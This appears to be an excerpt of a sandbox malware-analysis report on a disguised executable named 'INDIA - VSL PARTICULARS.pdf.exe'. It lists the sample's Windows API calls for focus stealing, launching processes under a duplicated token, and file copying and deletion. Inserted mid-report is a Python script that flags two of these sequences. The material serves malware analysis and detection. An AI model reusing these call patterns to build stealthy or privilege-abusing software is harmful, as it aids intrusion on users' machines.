                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                              • GetKeyState.USER32(00000011), ref: 0047C92D
                              • GetKeyState.USER32(00000009), ref: 0047C936
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                              • GetKeyState.USER32(00000010), ref: 0047C953
                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                              • _wcsncpy.LIBCMT ref: 0047CA29
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                              • SendMessageW.USER32 ref: 0047CA7F
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                              • ImageList_SetDragCursorImage.COMCTL32(00AC3130,00000000,00000000,00000000), ref: 0047CB9B
                              • ImageList_BeginDrag.COMCTL32(00AC3130,00000000,000000F8,000000F0), ref: 0047CBAC
                              • SetCapture.USER32(?), ref: 0047CBB6
                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                              • ReleaseCapture.USER32 ref: 0047CC3A
                              • GetCursorPos.USER32(?), ref: 0047CC72
                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                              • SendMessageW.USER32 ref: 0047CD12
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                              • SendMessageW.USER32 ref: 0047CD80
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                              • GetCursorPos.USER32(?), ref: 0047CDC8
                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                              • GetParent.USER32(00000000), ref: 0047CDF7
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                              • SendMessageW.USER32 ref: 0047CE93
                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,00A01B18,00000000,?,?,?,?), ref: 0047CF1C
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                              • SendMessageW.USER32 ref: 0047CF6B
                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,00A01B18,00000000,?,?,?,?), ref: 0047CFE6
                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3100379633-4164748364
                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                              APIs
                              • GetForegroundWindow.USER32 ref: 00434420
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                              • IsIconic.USER32(?), ref: 0043444F
                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                              • SetForegroundWindow.USER32(?), ref: 0043446A
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 2889586943-2988720461
                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                              APIs
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                              • CloseHandle.KERNEL32(?), ref: 004463A0
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                              • GetProcessWindowStation.USER32 ref: 004463D1
                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                              • _wcslen.LIBCMT ref: 00446498
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _wcsncpy.LIBCMT ref: 004464C0
                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                              • CloseDesktop.USER32(?), ref: 0044657A
                              • SetProcessWindowStation.USER32(?), ref: 00446588
                              • CloseHandle.KERNEL32(?), ref: 00446592
                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                              • String ID: $@OH$default$winsta0
                              • API String ID: 3324942560-3791954436
                              • Opcode ID: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                              • Opcode Fuzzy Hash: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
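The two function listings above (the AttachThreadInput / keybd_event / SetForegroundWindow sequence, and the OpenWindowStationW / OpenDesktopW / CreateProcessAsUserW sequence) are the kind of API pattern an analyst wants to pull out of a report like this mechanically rather than by eye. The Python below is an added example, not code from Joe Sandbox or from the analysed sample: it parses the report's bullet-line format into call records, names the bits of the raw access masks the listing prints (the 00060081 passed to OpenDesktopW is READ_CONTROL | WRITE_DAC | DESKTOP_READOBJECTS | DESKTOP_WRITEOBJECTS; 00060000 for the window station is READ_CONTROL | WRITE_DAC), and matches two behaviour rules whose names are this example's own. The 00000012 passed to keybd_event is VK_MENU, the Alt key; pressing and releasing Alt around SetForegroundWindow after AttachThreadInput is the standard way to get past the foreground-window lock, so the first rule keys on that value. The sample input is constructed by copying lines from the two listings above.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox report and triage them.
Added example, not code from Joe Sandbox or from the analysed sample: rule names are
this example's own and the sample lines are copied from this report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One listing line as the report renders it, e.g.
#   • keybd_event.USER32(00000012,00000000), ref: 004344CF
#   • GetCurrentThreadId.KERNEL32 ref: 00434485               (no argument list)
#     • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
LINE_RE = re.compile(
    r"^\s*(?:[•*-]\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class Call:
    api: str
    module: str
    args: list = field(default_factory=list)  # 8-hex-digit literal -> int, '?' -> None, else str
    ref: int = 0                              # call-site address
    subcall_of: Optional[int] = None          # set for "Part of subcall function" lines

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                           # argument the sandbox could not resolve
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):  # the report prints 32-bit values as 8 hex digits
        return int(tok, 16)
    return tok                                # resolved string, e.g. winsta0

def parse_listing(text: str) -> List[Call]:
    """Parse every line that looks like an API call; headings and hashes are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            sub = int(m["sub"], 16) if m["sub"] else None
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

# Access rights accepted by OpenDesktopW (winuser.h) plus the generic rights (winnt.h).
DESKTOP_ACCESS = [
    ("DESKTOP_READOBJECTS", 0x1), ("DESKTOP_CREATEWINDOW", 0x2), ("DESKTOP_CREATEMENU", 0x4),
    ("DESKTOP_HOOKCONTROL", 0x8), ("DESKTOP_JOURNALRECORD", 0x10), ("DESKTOP_JOURNALPLAYBACK", 0x20),
    ("DESKTOP_ENUMERATE", 0x40), ("DESKTOP_WRITEOBJECTS", 0x80), ("DESKTOP_SWITCHDESKTOP", 0x100),
    ("DELETE", 0x10000), ("READ_CONTROL", 0x20000), ("WRITE_DAC", 0x40000), ("WRITE_OWNER", 0x80000)]

def decode_mask(value: int, table) -> List[str]:
    """Name the bits set in an access mask; bits missing from the table are kept as hex."""
    names = [name for name, bit in table if value & bit]
    rest = value & ~sum(bit for _, bit in table)
    return names + ([hex(rest)] if rest else [])

VK_MENU = 0x12  # virtual-key code of the Alt key

# Each rule: name, API names that must all occur in the function, predicate on the arguments.
RULES = [
    # Alt pressed/released through keybd_event around SetForegroundWindow after
    # AttachThreadInput: the usual way to defeat the foreground-window lock.
    ("foreground_focus_steal",
     {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
     lambda cs: any(c.api == "keybd_event" and c.args[:1] == [VK_MENU] for c in cs)),
    # Interactive window station and desktop opened by name before CreateProcessAsUserW:
    # a process started under another token on the visible desktop.
    ("interactive_desktop_create_process_as_user",
     {"OpenWindowStationW", "OpenDesktopW", "CreateProcessAsUserW"},
     lambda cs: any(c.api == "OpenWindowStationW" and c.args[:1] == ["winsta0"] for c in cs)),
]

def match_rules(calls: List[Call]) -> List[str]:
    seen = {c.api for c in calls}
    return [name for name, need, pred in RULES if need <= seen and pred(calls)]

# Constructed sample input: lines copied from two function blocks of this report.
SAMPLE_FOCUS = """\
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
"""
SAMPLE_RUNAS = """\
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
"""

if __name__ == "__main__":
    for label, text in (("focus", SAMPLE_FOCUS), ("runas", SAMPLE_RUNAS)):
        calls = parse_listing(text)
        print(label, [c.api for c in calls], "->", match_rules(calls))
        print("  desktop access:", [decode_mask(c.args[-1], DESKTOP_ACCESS) for c in calls if c.api == "OpenDesktopW"])
```

Feed it the text of a whole report page and it skips the Strings, Memory Dump Source and hash lines on its own, so the function-by-function grouping is the only thing left to add; the "Part of subcall function" lines are kept with the caller's address in subcall_of so a rule can decide whether to count them. The rule predicates look at argument values rather than API names alone because the same API set appears in benign GUI code; it is the VK_MENU press and the explicit winsta0 open that make these two sequences worth flagging.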
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • _wcscat.LIBCMT ref: 0044BD94
                              • _wcscat.LIBCMT ref: 0044BDBD
                              • __wsplitpath.LIBCMT ref: 0044BDEA
                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                              • _wcscpy.LIBCMT ref: 0044BE71
                              • _wcscat.LIBCMT ref: 0044BE83
                              • _wcscat.LIBCMT ref: 0044BE95
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                              • DeleteFileW.KERNEL32(?), ref: 0044BED3
                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                              • DeleteFileW.KERNEL32(?), ref: 0044BF15
                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                              • FindClose.KERNEL32(00000000), ref: 0044BF33
                              • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                              • FindClose.KERNEL32(00000000), ref: 0044BF7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                              • String ID: \*.*
                              • API String ID: 2188072990-1173974218
                              • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                              • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                              • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                              • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                              • FindClose.KERNEL32(00000000), ref: 00478924
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                              • __swprintf.LIBCMT ref: 004789D3
                              • __swprintf.LIBCMT ref: 00478A1D
                              • __swprintf.LIBCMT ref: 00478A4B
                              • __swprintf.LIBCMT ref: 00478A79
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                              • __swprintf.LIBCMT ref: 00478AA7
                              • __swprintf.LIBCMT ref: 00478AD5
                              • __swprintf.LIBCMT ref: 00478B03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 999945258-2428617273
                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscpy.LIBCMT ref: 004034A7
                              • _wcscat.LIBCMT ref: 004034BC
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                              • _wcscpy.LIBCMT ref: 004035A0
                              • _wcslen.LIBCMT ref: 00403623
                              • _wcslen.LIBCMT ref: 0040367D
                              Strings
                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                              • _, xrefs: 0040371C
                              • Error opening the file, xrefs: 00428231
                              • Unterminated string, xrefs: 00428348
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                              • API String ID: 3393021363-188983378
                              • Opcode ID: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                              • Opcode Fuzzy Hash: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                              • FindClose.KERNEL32(00000000), ref: 00431B20
                              • FindClose.KERNEL32(00000000), ref: 00431B34
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1409584000-438819550
                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                              • __swprintf.LIBCMT ref: 00431C2E
                              • _wcslen.LIBCMT ref: 00431C3A
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                              • String ID: :$\$\??\%s
                              • API String ID: 2192556992-3457252023
                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                              • __swprintf.LIBCMT ref: 004722B9
